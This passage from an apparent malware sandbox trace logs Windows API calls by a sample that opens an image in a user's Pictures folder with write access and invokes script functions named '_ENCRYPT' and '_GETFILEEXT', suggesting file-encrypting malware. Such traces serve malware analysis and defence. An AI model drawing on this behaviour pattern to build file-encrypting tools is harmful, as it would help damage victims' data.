hHeap=0x770000) returned 1 [0040.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.229] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\sf5u9bknvl3bd-le1z7.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0040.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=81, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa2) returned 0x7c5448 [0040.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=81, lpWideCharStr=0x7c5448, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif") returned 81 [0040.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0040.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0040.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.231] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0040.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.233] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0040.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0040.233] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0040.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.234] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.234] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889628 [0040.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889628, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0040.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.235] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0040.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0040.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.235] CloseHandle (hObject=0x140) returned 1 [0040.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0040.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0040.235] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0040.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0040.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.236] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.236] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.236] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0040.236] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.236] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0040.236] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0040.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.236] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.236] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.237] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.237] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, 